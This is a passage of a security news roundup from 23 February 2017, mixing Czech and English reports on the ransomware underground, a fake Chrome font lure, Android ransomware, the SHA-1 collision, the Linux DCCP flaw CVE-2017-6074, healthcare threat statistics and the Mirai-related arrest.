Nejprve zašifrují vyděračské viry všechna data uložená na pevném disku. Za jejich zpřístupnění pak útočníci požadují výkupné, a to klidně i několik tisíc korun.
Kyberzločinci se zpravidla snaží v majiteli napadeného stroje vzbudit dojem, že se ke svým souborům dostane po zaplacení pokuty. Ta byla údajně vyměřena za používání nelegálního softwaru apod. I proto jim celá řada lidí již výkupné zaplatila.
Ani po zaplacení výkupného se ale uživatelé ke svým datům nedostanou. Místo placení výkupného je totiž nutné virus z počítače odinstalovat. Zpřístupnit nezálohovaná data je už ale ve většině případů nemožné.
Nečitelné webové stránky, respektive nabídka instalace chybějícího fontu, jsou jen další snahou kyberzločinců, jak šířit vyděračské viry.
Více než 75 % ransomwaru pochází od ruskojazyčných zločinců
23.2.2017 Root.cz Viry
Přinejmenším 47 z celkových 62 ransomwarových rodin objevených v roce 2016 experty Kaspersky Lab bylo vyvinuto ruskojazyčnými kyberzločinci. To je jedno ze zjištění průzkumu, zaměřeného na ruskojazyčné ransomwarové podsvětí.
Společnost Kaspersky Lab zjistila, že se malé skupiny s omezenými schopnostmi transformují do velkých uskupení, která mají zdroje a ambice útočit na soukromé a korporátní cíle po celém světě.
Šifrovací ransomware – druh malwaru, který zašifruje složky oběti a za jejich odšifrování požaduje výkupné – je v současnosti jedním z nejnebezpečnějších druhů malwaru. Na základě dat společnosti Kaspersky Lab bylo v roce 2016 napadeno tímto druhem malwaru více než 1 445 000 uživatelů (včetně firem) po celém světě, píše se ve zprávě. S cílem lépe porozumět charakteru těchto útoků vypracovala Kaspersky Lab přehled ruskojazyčné ilegální komunity.
V poslední době je zaznamenatelný dramatický nárůst počtu útoků. Zpráva se zabývá také tím, proč se to děje právě teď, když ransomware je tu s námi už přes deset let. Důvody jsou prý tři:
Na černém trhu je velmi snadné koupit si nástroje k sestavení vlastního ransomware,
je možné si také koupit službu k distribuci vyděračského kódu,
díky kryptoměnám je byznysmodel vyděračů velmi jednoduchý.
Tři kola v soukolí
Jedním z hlavních zjištění je, že za vzestupem útoků šifrovacím ransomwarem v průběhu několika posledních let stojí velmi přizpůsobivý a uživatelsky nenáročný ekosystém. Ten dovoluje zločincům zaútočit šifrovacím ransomwarem bez ohledu na jejich programátorské schopnosti a finanční zdroje.
Odborníci identifikovali tři druhy zapojení do kriminální činnosti, týkající se ransomwaru:
Tvorba a vylepšování nových ransomwarových rodin,
vývoj a podpora programů spojených s distribucí ransomwaru,
účast v přidružených programech jako partner.
První druh zapojení vyžaduje po účastníkovi pokročilou znalost programování. Kyberzločinci, kteří vytvářejí nový ransomware, se v ransomwarovém podsvětí těší největší úctě, protože jsou to právě oni, kdo dávají vzniknout klíčovému elementu, na němž stojí celý ekosystém.
Inzerát nabízející ransomware s pokročilými vlastnostmi: silné šifrování, anti-emulační techniky, možnost zálohování uživatelských dat…
O úroveň níže jsou v hierarchii ti, kdo stojí za vývojem přidružených programů. Spadají sem i kriminální komunity, které s pomocí různých nástrojů, jako jsou exploit kit nebo spam, šíří ransomware.
Partneři přidružených programů jsou na nejnižší úrovni celého systému. Za využití různých technik pomáhají majitelům přidružených programů s distribucí malwaru výměnou za podíl na výkupném. Jediné co tito členové potřebují, je odhodlání a připravenost spáchat nelegální čin, přičemž pro vstup do tohoto „podnikání“ jim stačí jen pár bitcoinů.
Staň se partnerem, čím víc vyděláš, tím víc ti zůstane
Velký byznys především z Ruska
Podle odhadů se celkový denní výnos přidružených programů může pohybovat v desítkách až dokonce stovkách tisíc dolarů, z nichž okolo 60 % zůstává u samotných tvůrců jako čistý zisk.
Experti navíc při prozkoumávání tohoto podsvětí identifikovali několik rozsáhlých skupin ruskojazyčných zločinců specializujících se na vývoj a distribuci šifrovacího ransomwaru. Tyto skupiny mohou sdružovat desítky různých partnerů, z nichž každý má jiné programy cílící nejen na běžné internetové uživatele, ale i malé a střední podniky či dokonce velké společnosti. Původně se tyto skupiny zaměřovaly na Rusko a státy bývalého Sovětského svazu, ale nyní projevují čím dál větší zájem o společnosti i v jiných částech světa.
Více než tři čtvrtiny jednotlivých rodin ransomware mají napojení na rusky mluvící skupiny či jednotlivce. Tyto informace vycházejí z fór, řídicí infrastruktury a dalších informací dostupných na internetu, píše se ve zprávě. Důvodů je prý opět několik: v Rusku a jeho okolí je spousta zkušených programátorů a především tamní podsvětí má už s vyděračským softwarem své zkušenosti.
Ještě před dnešní velkou vlnou ransomware napojeného na kryptoměny se mezi lety 2009 a 2011 objevila v rusky mluvících zemích epidemie „lockerů“, které znemožnily používat prohlížeč nebo celý operační systém, dokud uživatel nezaplatil. Tehdy se platilo především pomocí prémiových SMS, dnes se otevřela cesta k jinému způsobu placení. Model ale zůstává stejný.
Několik velkých jmen na špici
Programátoři, šiřitelé i partneři tvoří velkou velkou organizaci, která se dohromady živí kyberzločinem. V současné době existuje v ruskojazyčných zemích jen několik velkých ransomwarových skupin. V čele stojí tvůrce malware a zároveň šéf celé operace. Ten tvoří samotný útočný kód, jeho moduly a spravuje provozní infrastrukturu.
S ním spolupracuje manažer, jehož prací je získávat nové partnery a podporovat ty stávající. Jen manažer přímo komunikuje s tvůrcem. Partneři, kterých je několik desítek, pak mají za úkol získávat aktuální verzi ransomware a šířit ji mezi oběti. Dělají to pomocí různých nástrojů a také pomocí affiliate spolupracovníků – lidí na nejnižší příčce v žebříčku. Všichni dostanou z vydělaných peněz svůj podíl.
Tisíce dolarů denně
Podle analýzy Kaspersky Lab se může příjem takové úspěšné skupiny pohybovat v řádu tisícovek dolarů denně. Profesionálně organizovaná skupina má ale zároveň nemalé výdaje, musí: aktualizovat malware, psát pro něj moduly, vylepšovat šifrování, přidávat nové techniky skrývání, sledovat reakci antivirových společností a platit lidi udržující infrastrukturu. Přesto zůstane v kapsách útočníků většina příjmů – až 60 %.
Ransomware se pak šíří především čtyřmi cestami: exploit kity, spamovými kampaněmi, sociálním inženýrstvím a cílenými útoky. Nejúspěšnější je využití exploit kitů, jejichž pronájem stojí tisíce dolarů měsíčně. Druhou nejúspěšnější metodou je šíření pomocí spamu, který se obvykle vydává za důležitou zprávu úřadů nebo třeba banky.
K útokům se čím dál častěji zneužívají také skutečné e-mailové účty už napadených firem. To usnadňuje šíření, protože nový příjemce dostává poštu od uživatele, kterého skutečně zná a může si s ním běžně psát. Zdá se, že útočníci napadnou jednu společnost, dostanou se do jejího e-mailového systému a pak odesílají ransomware na získané kontakty.
Profesionální skupiny se přesouvají k cíleným útokům
Analýza také říká, že se útočníci čím dál častěji přesouvají k cíleným útokům. Od jednotlivých uživatelů a malých organizací jdou spíše za relativně velkými firmami, které je možné přímo vydírat a získat tak jednorázově velké sumy. V jednom případě jsme viděli cílený útok na firmu s 200 počítači a jinou s 1000 stanicemi, říká zpráva.
Použitá metoda se přitom zásadně liší od dříve používaných postupů – nepoužívají se e-mailové kampaně, ale cílený útok na síť. Nejprve je nalezen zranitelný server, který patří velké společnosti. K útoku jsou použity volně dostupné exploity a nástroje. Pokud je v síti otevřený RDP přístup, útočníci jej využijí.
Poté jsou použity RAT nástroje jako PUPY a Mimikatz pro infikování sítě. Poté útočníci síť studují a prozkoumají a v konečné fázi pro ni na míru napíší ransomware, který ještě nebyl použit nikde jinde. Druhou variantou je ruční zašifrování důležitých souborů na serverech.
Útočníci se podle Kaspersky Lab přesouvají k sofistikovanějším typům útoku také proto, že jde o úspěšný byznys a skupiny jsou velmi dobře financovány. Zároveň je v případě firem způsobit přímé škody paralyzováním celé infrastruktury a poté požadovat velké výkupné. Odborníci proto radí, abyste rozhodně v případě takového útoku neplatili. Pokud to uděláte, vaše peníze poputují do ekosystému a čím víc financí zločinci dostanou, tím lepší budou mít přístup k sofistikovanějším nástrojům a dalším příležitostem.
Ransomware je instalován místo fontu pro Google Chrome. Útočníci jej šíří i na legitimních webech
23.2.2017 Živě.cz Viry
Jednu z nových cest, které mají malware dostat ke svým obětem popsal web Forbes. Je zaměřena především na uživatele nejrozšířenějšího prohlížeče Chrome a nejčastěji je uživatel napaden ransomwarem – škodlivým programem, který se postará o zašifrování souborů. Jejich znovuzpřístupnění je potom podmíněno zaplacením výkupného.
Chytrý kryt pro webovou kameru má chránit soukromí. Zaujal na Kickstarteru
Aktuální hrozba využívá dobře známého triku, kdy je uživateli podsunut falešný instalační soubor důležitého doplňku. Většinou to bývá aktualizace Flash Playeru či Javy, která umožní přehrání obsahu na webu. Tady však útočnici využili nový trik, kdy je malware distribuován na webu s nečitelným textem, který má být zpřístupněn po nainstalování dodatečných fontů. Místo nich je však uživateli nabídnut spustitelný EXE soubor, který se sice nazývá Chrome Font v7.51, ale místo nových písem se uživatel dočká zašifrovaných dat.
Útočníci naservírují uživateli web s nečitelným textem. Ten má být korektně zobrazen až po instalaci nového fontu. Za ním se samozřejmě skrývá malware (zdroj: Neosmart)
Pokud tedy náhodou narazíte na web, který zobrazí hlášku typu HoeflerText font was not found, rozhodně nestahujte nabízený soubor. Před instalací by měl rovněž upozorňovat samotný prohlížeč, nicméně neopatrní uživatelé by se k instalaci přeci jen mohli odhodlat.
Před stažením nebezpečného souboru by měl upozornit samotný Chrome výstrahou (zdroj: Neosmart)
Největší nebezpečí spočívá ve způsobu distribuce – útočníci totiž využívají legitimní webové stránky, k nimž získali přístup.
This What Hackers Think of Your Defenses
23.2.2017 securityweek Cyber
Billions of dollars are spent every year on cyber security products; and yet those products continually fail to protect businesses. Thousands of reports analyze breaches and provide reams of data on what happened; but still the picture worsens. A new study takes a different approach; instead of trying to prevent hacking based on what hacking has achieved, it asks real hackers, how do you do it?
The hackers in question are the legal pentesters attending last Summer's DEFCON conference. Seventy were asked about what they do, how they do it, and why they do it -- and the responses are sobering. The resulting report, The Black Report by Nuix, is a fascinating read. It includes sections on the psycho-social origins of cybercrime and a view from law enforcement: but nothing is as valuable as the views from the hackers themselves. These views directly threaten many of the sacred cows of cyber security. They are worth considering: "The only difference between me and a terrorist is a piece of paper [a statement of work] making what I do legal. The attacks, the tools, the methodology; it's all the same."
HackersWhat they do is surprisingly easy and frighteningly successful. Take sacred cow #1: it takes 250-300 days for the average organization to detect a breach, and the earlier it is detected, the less damage will be done. But there is less time than you think. Eighty-eight percent of the pentesters claim that it takes less than 12 hours to compromise a target; and 80% say it then takes less than another 12 hours to find and steal the data. Even though they are employed, and therefore expected, a third claim their presence is not detected by the security teams they attack. "Data breaches take an average of 250-300 days to detect -- if they're detected at all -- but most attackers tell us they can break in and steal the target data within 24 hours," said Chris Pogue, Nuix CISO and a co-author of the Nuix Black Report. "Organizations need to get much better at detecting and remediating breaches using a combination of people and technology."
Sacred cow #2 could affect the cyber security skills gap. A recent ISACA survey shows that 70% of employers require a security certification before employing new staff. The people they are defending against, however, place little value in those certifications. "Over 75% did not believe technical certifications were an accurate indicator of ability," notes the report. While 4% of the pentesters hoard certifications like bitcoins with more than 10, 66% have three or less. Clearly, demonstrable ability is more important than paper qualifications -- aptitude testing rather than certificate counting might just close that skills gap.
Sacred cow #3 is that anti-virus and a firewall equates to security. Only 10% of the pentesters admitted to being troubled by firewalls, and a mere 2% by anti-virus. Nevertheless, modern endpoint security is the biggest problem for (that is, best defense against) hackers; with 36% saying it is an effective countermeasure.
Conversely, this demonstrates that sacred cow #4 remains a sacred cow: "For security decision-makers," says the report, "this result clearly demonstrates the importance of defense in depth rather than relying on any single control. Any individual security control can be defeated by an attacker with enough time and motivation. However, when an organization uses a combination of controls along with security training, education, and processes, the failure of any single control does not automatically lead to data compromise."
It's worth adding, however, that nearly a quarter of the hackers boasted "that no security countermeasures could stop them and that a full compromise was only a matter of time."
When asked what companies should buy to improve their security posture, 37% suggested intrusion detection/prevention systems. Only 6% suggested perimeter defenses. When asked the opposite question (that is, the least effective spend) data hygiene/information governance at 42% is seen as less effective than perimeter defenses at 21%. Somewhat anomalously, penetration testing is seen as the second most effective spend at 25%, and simultaneously the least effective at 4%.
One of the biggest surprises of the survey is that while companies may go to the expense of a penetration test, they will not necessarily act upon the results. "Only 10% of respondents indicated that they saw full remediation of all identified vulnerabilities, and subsequent retesting," notes the report. Indeed, 5% of the respondents saw no remediation whatsoever from their clients -- they were just checking boxes. Seventy-five per cent indicated that there was some remediation, but usually focused on high and critical vulnerabilities.
"While 'fix the biggest problems' appears to be a logical approach to remediation, it misrepresents the true nature of vulnerabilities and provides a false sense of security for decision makers," warns the report. "If you only address specific vulnerabilities that you have chosen arbitrarily and devoid of context, it's the cybersecurity equivalent of taking an aspirin for a brain tumor; you are addressing a symptom as opposed to the root cause."
Of course, this failure to fully remediate may be a side-effect of compliance. Elsewhere in the survey, 30% of the pentesters felt they were employed for compliance purposes only: "We have to deal with security for compliance reasons, nothing more." This resonates with the suggestion that the companies that did zero remediation were 'just ticking boxes' -- it is the hidden danger within the growing number of penetration testing compliance requirements.
The real value of this survey is that it can make security decision makers question what security vendors tell them. The purpose of security software is first and foremost to be sold, and only then to do what it says on the box. By looking at how professional hackers work, security teams are in a better position to plug the gaps effectively rather than just by the latest technicolor product.
Android Ransomware Demands Victims Speak Unlock Code
23.2.2017 securityweek Android
A newly discovered Android ransomware variant that packs speech recognition capabilities demands that victims speak a code provided by the attackers to unlock their devices, Symantec warns.
Dubbed Android.Lockdroid.E, the malware has been targeting Android users for over a year, but appears to be under development still, as its author is testing out various capabilities. In addition to locking devices, the new variant leverages speech recognition APIs to determine whether the user has provided it with the necessary passcode to unlock the device.
Most ransomware would ask users to type a passcode to regain access to their smartphone, but Android.Lockdroid.E’s author is experimenting with additional capabilities, Symantec’s Dinesh Venkatesan reveals. Targeting Chinese speakers at the moment, the malware can lock the user out using a SYSTEM type window, after which it displays a ransom note.
Written in Chinese, the note provides users with instructions on how to unlock the device, and also includes a QQ instant messaging ID that users should contact to receive further instructions on how to pay the ransom. However, since the device is already locked, users need a second device to contact the cybercriminals behind the threat and receive an unlock code.
Additionally, the ransom note instructs the victim to press a button to launch the speech recognition functionality. The malware abuses third-party speech recognition APIs for this function, and compares the spoken words heuristically with the expected passcode. The lockscreen is removed if the input matches.
“For some cases, the recognized words are normalized to accommodate any small degree of inaccuracies that an automated speech recognizer is bound to,” Symantec’s researcher explains.
The image used for the lockscreen, as well as the passcode information are stored in the malware’s assets files, in encoded form with additional padding. The researcher managed to extract the passcode using an automated script and says that the threat uses different types of passcodes. In fact, a different passcode is used for each infection.
A previously discovered Android.Lockdroid.E variant was using an inefficient 2D barcode ransom demand, which also required users to have a second device for scanning purposes, thus making it difficult for users to pay the ransom. The new variant doesn’t get any better, as it too requires a second device to contact the cybercriminals.
“While analyzing these latest Android.Lockdroid.E variants, I observed several implementation bugs such as improper speech recognition intent firing and copy/paste errors. It’s clear that the malware authors are continually experimenting with new methods to achieve their goal of extorting money from their victims. We can be certain this isn’t the last trick we’ll see from this threat family,” Venkatesan notes.
As always, users are advised to keep their software up to date and refrain from downloading applications from unfamiliar websites, but use only trusted sources for these operations. Further, users should pay attention to the permissions requested by apps, should keep their data backed up, and should install a suitable mobile security app for additional protection.
Netflix Releases Open Source Security Tool "Stethoscope"
23.2.2017 securityweek Security
Netflix this week released Stethoscope, an open source web application that gives users specific recommendations for securing their computers, smartphones and tablets.
Stethoscope was developed by Netflix as part of its “user focused security” approach, which is based on the theory that it is better to provide employees actionable information and low-friction tools, rather than relying on heavy-handed policy enforcement.
Netflix believes employees are more productive when they don’t have to deal with too many rules and processes. That is why Stethoscope scans their devices and provides recommendations on security measures that should be taken, but allows them to perform the tasks on their own time.
Stethoscope analyzes a device’s disk encryption, firewall, automatic updates, operating system and software updates, screen lock, jailbreaking or rooting, and installed security software. Each of these factors is attributed a rating based on its importance.
Stethoscope was developed in Python (backend) and React (frontend), and it does not have its own data store. Data sources are implemented as plugins, allowing users to add new inputs.
For the time being, the application supports LANDESK for Windows computers, JAMF for Macs and Google MDM for mobile devices. However, Netflix wants to extend the list of data sources and Facebook’s Osquery is first on the list.
The modular architecture allows users to add new security checks and other functionality by developing plugins.
The Stethoscope source code, along with instructions for installation and configuration, are available on GitHub. Netflix has invited users to contribute to the tool, particularly with new plugins.
Stethoscope is not the only open source security tool released by Netflix. The company has made available the source code for several of the applications it uses, including the XSS discovery framework Sleepy Puppy, and the threat monitoring tools Scumblr and Sketchy.
Code Execution Flaw Affected Linux Kernel Since 2005
23.2.2017 securityweek Vulnerebility
A researcher has discovered a serious locally exploitable vulnerability that appears to have been around in the Linux kernel for more than 11 years. The flaw has been addressed in the kernel and Linux distributions are working on releasing patches.
The weakness, a double-free vulnerability tracked as CVE-2017-6074, was discovered by Google software engineering intern Andrey Konovalov using syzkaller, an open source Linux fuzzer developed by the tech giant.
The flaw affects the Datagram Congestion Control Protocol (DCCP) implementation for Linux since the release of version 2.6.14 in October 2005. In fact, this was the first kernel version to include support for DCCP.
According to the researcher, the vulnerability allows an unprivileged process to execute arbitrary code within the kernel. Affected Linux distributions said the flaw can be exploited for privilege escalation or denial-of-service (DoS) attacks.
“A flaw was found in the Linux kernel’s implementation of the DCCP protocol in which a local user could create influence timing in which a [socket buffer] could be used after it had been freed by the kernel,” explained Gentoo developer Thomas Deutschmann. “An attacker who is able to craft structures allocated in this free memory will be able to create memory corruption, privilege escalation or crash the system.”
The vulnerability was reported to Linux kernel developers on February 15 and a fix was released within two days. Linux distributions were informed about the flaw on February 18 and they are working on patches.
Fixes have already been released for Ubuntu, and Red Hat has informed users that the exploit can be mitigated using recent versions of SELinux.
Konovalov says he will make a proof-of-concept (PoC) exploit available after users have had a chance to update their installations.
These Were the Top Threats Targeting Healthcare Firms in Q4 2016
23.2.2017 securityweek Cyber
Healthcare is a consistent target for cybercriminals, with IBM's 2016 Cyber Security Intelligence Index claiming it had become the single most attacked industry. Today FortiGuard Labs has released details on the top 5 methods used to attack healthcare in Q4, 2016.
The research draws on telemetry gathered from 454 healthcare companies in 50 different countries. It outlines the top five threats detected in malware, ransomware, mobile malware, IPS events, botnets, and exploit kits.
The top malware threat comes from VBS/Agent.LKY!tr with more than 85,000 detections. This is best known as the initial attack vector for a ransomware attack. The second most prevalent malware is Riskware/Asparnet, with close to 78,000 detections. This is usually installed unintentionally, and is designed to collect sensitive information.
Unsurprisingly, given the size of the ransomware threat to the healthcare industry, four of the top five malware threats have a ransomware connection. The remaining three are VBS/Agent.97E!tr (31,000 detections), JS/Nemucod.BQM!tr (30,000 detections), and JS/Nemucod.76CD!tr.dldr (28,000 detections).
By far the most prolific ransomware detected during this period was CryptoWall, accounting for 91% of all ransomware infections detected. Cerber accounted for 6% of detections, and TorrentLocker for 3%. TeslaCrypt and Locky were also detected, but each at less than 1% of infections.
Mobile malware is a particular concern for the healthcare industry given the mobility of much of the workforce -- doctors and nurses spend much of their time moving between patients and visiting home patients. Android malware occupies all five top slots for mobile malware detected during Q4 2016. This is unsurprising given the prevalence of Android devices and the open nature of the operating system compared to that of iOS. "This could be due to the fact that Android devices allow users to easily install apps from 3rd party sources, which could sometimes be loaded with Android-based malware," notes the report.
By far the most prevalant mobile malware is Android/Qysly.B!tr. With around 4700 detections during the period, this is twice the number of Android/Generic.Z.2E7279!tr detections (around 2300).
IPS event detections shows that the internet of things is becoming a major attack vector, especially for healthcare. Top spot goes to VxWorks.WDB.Agent.Debug.Service.Code.Execution with nearly 1.9 million hits. "VxWorks is an operating system for embedded devices," notes the report, "which includes medical devices such as CT/PET/X-ray instrumentation, infusion pumps, personal activity monitors, and many others." The vulnerability was discovered in 2010, but criminals clearly believe that not all devices will have been patched.
The second most prevalent IPS event (Web.Server.etc.passwd.Access) has just over 500,000 detections, probing for misconfigured Unix-based web servers that may expose operating system usernames from /etc/passwd. Third is SQLi attempts on web servers; fourth are attempts to exploit Netcore/Netis routers; and fifth is ShellShock.
The top botnet detected is Andromeda, comprising a loader that has both anti-VM and anti-debug features that downloads modules and updates from its C2 server. Andromeda has been around since 2011. Second is H-worm, a VBscript-based botnet that steals sensitive information. Third is Necurs, particularly associated with delivering the Locky ransomware.
Conficker, one of the largest botnets ever known and dating back to 2008 is still there at number four -- demonstrating that there are still many unpatched Windows systems around. Pushdo, at five, has also been around for several years. It is mostly associated with large spam campaigns.
The most frequently detected exploit kit is RIG, at 46%. "Coming in 2nd place at 23% is CK, followed by Angler (16%), Neutrino (12%) and other less popular exploit kits at 3%. Most of these exploit kits are used for ransomware distribution."
Most of the threats against the healthcare industry are associated in one way or another with ransomware -- due, says FortiGuard, "to the higher probability of collecting ransom when sensitive healthcare data is encrypted." But FortiGuard has also detected many old threats against targets that should have been patched long ago. Patching is a problem for all industries, but operational medical devices are like the OT in industrial operations: there is a reluctance to tinker with critical systems that are working and in constant use.
First SHA-1 Collision Attack Conducted by Google, CWI
23.2.2017 securityweek Attack
Researchers at Google and Centrum Wiskunde & Informatica (CWI) in the Netherlands have managed to conduct the first real world collision attack against SHA-1, creating two documents with different content but identical hashes.
SHA-1 was introduced in 1995 and the first attacks against the cryptographic hash function were announced a decade later. Attacks improved over the years and, in 2015, researchers disclosed a method that lowered the cost of an SHA-1 collision to $75,000-$120,000 using Amazon’s EC2 cloud over a period of a few months.
Despite steps taken by companies such as Google, Facebook, Microsoft and Mozilla to move away from SHA-1, the hash function is still widely used.
Google and CWI, which is the national research institute for mathematics and computer science in the Netherlands, have now managed to find a collision, demonstrating that these attacks have become increasingly practical. Their technique has been dubbed “SHA-1 shattered” or “SHAttered.”
“We were able to find this collision by combining many special cryptanalytic techniques in complex ways and improving upon previous work. In total the computational effort spent is equivalent to 2 63.1 SHA-1 compressions and took approximately 6 500 CPU years and 100 GPU years,” experts said in their paper.
While the task still required a large number of computations – nine quintillion (9,223,372,036,854,775,808) to be precise – the SHAttered attack is 100,000 times faster than a brute-force attack.
The first phase of the attack was run on a heterogeneous CPU cluster hosted by Google and spread across eight physical locations. The second and more expensive phase was run on a heterogeneous cluster of K20, K40 and K80 GPUs hosted by Google.
Researchers have calculated that conducting the second phase of the attack using Amazon’s cloud would cost roughly $560,000, but the cost can be reduced to $110,000 if the attacker is patient and takes advantage of Spot instances.
Google has demonstrated the attack by releasing two PDF files that have different content, but the same SHA-1 hash. In accordance with the company’s disclosure policy, the code that allows anyone to create such PDFs will be made available after 90 days.
These collisions can pose a serious threat to a wide range of systems, including digital certificates, email signatures, software updates, backup systems, and version control tools (e.g. Git).
In order to help users identify such attacks, a free online tool that scans for SHA-1 collisions in documents has been released on the shattered.io website. Protections have also been integrated into Gmail and Google Drive. However, Google and CWI hope this attack will convince the industry to speed up migration to SHA-256 and SHA-3.
“The attack still requires a large amount of computing on both CPUs and GPUs but is expected to be within the realm of ability for nation states or people who can afford the cloud computing time to mount a collision attack,” David Chismon, senior security consultant at MWR InfoSecurity, told SecurityWeek.
“Hopefully these new efforts of Google of making a real-world attack possible will lead to vendors and infrastructure managers quickly removing SHA-1 from their products and configuration as, despite it being a deprecated algorithm, some vendors still sell products that do not support more modern hashing algorithms or charge an extra cost to do so,” Chismon added. “However, whether this happens before malicious actors are able to exploit the issue for their benefit remains to be seen.”
Hacker Who Knocked Million Routers Offline Using MIRAI Arrested at London Airport
23.2.2017 thehackernews BotNet
British police have arrested a suspect in connection with the massive attack on Deutsche Telekom that hit nearly 1 Million routers last November.
Late last year, someone knocked down more than 900,000 broadband routers belonging to Deutsche Telekom users in Germany, which affected the telephony, television, and internet service in the country.
Now, Germany's federal criminal police force (BKA) revealed today that the UK's National Crime Agency (NCA) reportedly arrested a 29-year-old British suspect at Luton airport in London on Wednesday, who is accused of being the mastermind behind the last year's attack.
In a statement, the German police said the last year's attack was especially severe and was carried out to compromise the home routers to enroll them in a network of hijacked machines popularly known as Botnet, and then offer the DDoS services for sale on dark web markets.
But ultimately, the attack created a denial-of-service situation, which resulted in more than 900,000 customers losing Internet connectivity for a while.
"From the outset, Deutsche Telekom cooperated with law enforcement agencies," BKA said. "Technical assistance was also provided by the Federal Office for Information Security (BSI) in the analysis of the malicious software used."
The Botnet of hacked machines is used to carry out "distributed denial of service" (DDoS) attacks to knock any site or server offline by sending them a larger number of rogue requests than they can handle.
It is believed that a modified version of the infamous Mirai malware – a piece of nasty IoT malware which scans for insecure routers, cameras, DVRs, and other IoT devices and enslaves them into a botnet network – was used to create service disruption.
Mirai is the same botnet that knocked the entire Internet offline last year, crippling some of the world's biggest and most popular websites.
The BKA got involved in the investigation as the attack on Deutsche Telekom was deemed to be a threat to the country's national communication infrastructure.
German police from the city of Cologne identified the suspect and issued the international arrest warrant.
The BKA said the cops would extradite the 29-year-old man to Germany to face charges of computer sabotage. If convicted, he can get a prison sentence of up to 10 years.
The department said it would release further information by the ongoing investigations.
Google Achieves First-Ever Successful SHA-1 Collision Attack
23.2.2017 thehackernews Attack
SHA-1, Secure Hash Algorithm 1, a very popular cryptographic hashing function designed in 1995 by the NSA, is officially dead after a team of researchers from Google and the CWI Institute in Amsterdam announced today submitted the first ever successful SHA-1 collision attack.
SHA-1 was designed in 1995 by the National Security Agency (NSA) as a part of the Digital Signature Algorithm. Like other hashes, SHA-1 also converts any input message to a long string of numbers and letters that serve as a cryptographic fingerprint for that particular message.
Collision attacks appear when the same hash value (fingerprint) is produced for two different messages, which then can be exploited to forge digital signatures, allowing attackers to break communications encoded with SHA-1.
The explanation is technologically tricky, but you can think of it as attackers who surgically alters their fingerprints in order to match yours, and then uses that to unlock your smartphone.
The researchers have been warning about the lack of security of SHA1 from over a decade ago, but the hash function remains widely used.
In October 2015, a team of researchers headed by Marc Stevens from the Centrum Wiskunde & Informatica (CWI) in the Netherlands had published a paper that outlined a practical approach to creating a SHA-1 collision attack – Freestart Collision.
At that time the experts estimated that the cost of an SHA-1 collision attack would cost between $75,000 and $120,000 using computing power from Amazon’s EC2 cloud over a period of a few months.
The Collision Attack 'SHAttered' the Internet
The Google approached the same group of researchers, worked with them and today published new research detailing a successful SHA1 collision attack, which they dubbed SHAttered and costs just $110,000 to carry out on Amazon's cloud computing platform.
As proof of concept, the new research presents two PDF files [PDF1, PDF2] that have the same SHA1 hash, but display totally different content.
According to researchers, the SHAttered attack is 100,000 faster than the brute force attack and technique could be used to create collisions in GIT file objects or even digital certificates.
"This attack required over 9,223,372,036,854,775,808 SHA1 computations. This took the equivalent processing power as 6,500 years of single-CPU computations and 110 years of single-GPU computations," the researcher explains.
"While those numbers seem very large, the SHA-1 shattered attack is still more than 100,000 times faster than a brute force attack which remains impractical."
90-days for Services to Migrate to Safer Cryptographic Hashes
Despite declared insecure by researchers over a decade ago and Microsoft in November 2013, announcing it would not accept SHA1 certificates after 2016, SHA1 has widely been used over the Internet.
Infact, Git – the world's most widely used free open-source system for managing software development – relies on SHA1 for data integrity.
So, it's high time to migrate to safer cryptographic hashes such as SHA-256 and SHA-3.
Google is planning to release the proof-of-concept (PoC) code in 90 days, which the company used for the collision attack, meaning anyone can create a pair of PDFs that hash to the same SHA-1 sum given two distinct images with some pre-conditions.
Therefore, Git and an unknown number of other widely used services that still rely on the insecure SHA1 algorithm have three months to replace it with the more secure one.
Meanwhile, Google and researchers have released a free detection tool that detects if files are part of a collision attack. You can find both the tool and much more information about the first collision attack at shattered.io.
Netflix releases the Stethoscope tool to improve security
23.2.2017 securityaffairs Security
Netflix has released the Stethoscope open source web application that provides recommendations for securing their devices.
Netflix has released Stethoscope, an open source web application that provides recommendations for securing computers, smartphones, and tablets.
Netflix intends to follow a “user focused security” approach that aims to provide employees information to improve their security posture, rather than relying on the enforcement of mandatory policies.
The vast majority of attacks against business targets corporate users causing security incidents and data breaches. The humans are the weakest link in the security chain, for this reason, Netflix decided to focus its approach on the users considering “the true context of people’s work”.
The company believes that productivity could be improved if employees don’t have to deal with too many rules and processes. That is why the Netflix Stethoscope scans their devices and provides recommendations on security measures that should be taken, but allows them to perform the tasks on their own time.
The tool doesn’t apply any corrective directly but allows employees to perform the necessary action to secure their systems.
“Stethoscope is a web application that collects information for a given user’s devices and gives them clear and specific recommendations for securing their systems.” reads the description of the tool. “By providing personalized, actionable information–and not relying on automatic enforcement–Stethoscope respects people’s time, attention, and autonomy, while improving our company’s security outcomes.”
Stethoscope analyzes several aspects of employee’s device, including the presence of security software (firewall), disk encryption, automatic updates, operating system and software updates, screen lock, and jailbreaking or rooting.
This information is elaborated by the Stethoscope tool that rates them based on the criticality of the tasks to complete.
Netflix Stethoscope is a Python-based tool with a user interface developed with the React framework. The tool does not have its own data store, data sources are implemented as plugins, making the application scalable and allowing users to add new dataset and new security checks.
“The various data sources are implemented as plugins, so it should be relatively straightforward to add new inputs. We currently support LANDESK (for Windows), JAMF (for Macs), and Google MDM (for mobile devices).” continues the description from Netflix.
Netflix Stethoscope will likely include also Facebook’s Osquery is the list of future data sources.
The tool is an open project, everyone can contribute, the Stethoscope source code is available on GitHub.
CVE-2017-6074 – a new 11-year old Linux Kernel flaw discovered
23.2.2017 securityaffairs Vulnerebility
Security expert discovered a new 11-year old privilege escalation vulnerability, tracked as CVE-2017-6074, in the Linux kernel.
A new privilege escalation vulnerability, tracked as CVE-2017-6074, has been discovered in the Linux kernel and the astonishing new is that it is an 11-year old flaw.
The local privilege-escalation vulnerability, discovered by security researcher Andrey Konovalov, affects all the major Linux distro, including Debian, OpenSUSE, Redhat, and Ubuntu.
The flaw discovered by Konovalov resides in the DCCP (Datagram Congestion Control Protocol) implementation using Syzkaller that is a kernel fuzzing tool released by Google.
The Datagram Congestion Control Protocol (DCCP) is a message-oriented transport layer protocol that implements reliable connection setup, maintenance, and teardown, of an unreliable packet flow, and the congestion control of that packet flow.
The flaw is a use-after-free vulnerability in the way the Linux kernel’s “DCCP protocol implementation freed SKB (socket buffer) resources for a DCCP_PKT_REQUEST packet when the IPV6_RECVPKTINFO option is set on the socket.”
“In the current DCCP implementation an skb for a DCCP_PKT_REQUEST
packet is forcibly freed via __kfree_skb in dccp_rcv_state_process if
